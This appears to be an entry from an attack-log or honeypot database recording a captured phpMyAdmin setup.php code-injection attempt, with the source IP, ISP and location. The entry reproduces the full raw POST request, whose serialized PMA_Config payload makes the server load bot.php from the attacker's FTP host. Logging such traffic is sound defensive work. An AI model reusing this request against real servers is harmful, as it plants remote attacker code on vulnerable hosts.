This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-1 of 1 results (1 page)

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

[Attack info]
Attacker: 95.110.227.41
Dest. port: 80
Time: 05/10/2019 20:13:47
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
POST /phpMyAdmin/scripts/setup.php HTTP/1.1 Content-Length: 234 cookie2: $Version="1" Host: 44.31.158.121 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] connection: TE referer: http://44.31.158.121/phpMyAdmin/scripts/setup.php cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da te: deflate,gzip;q=0.3 Content-Type: application/x-www-form-urlencoded action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D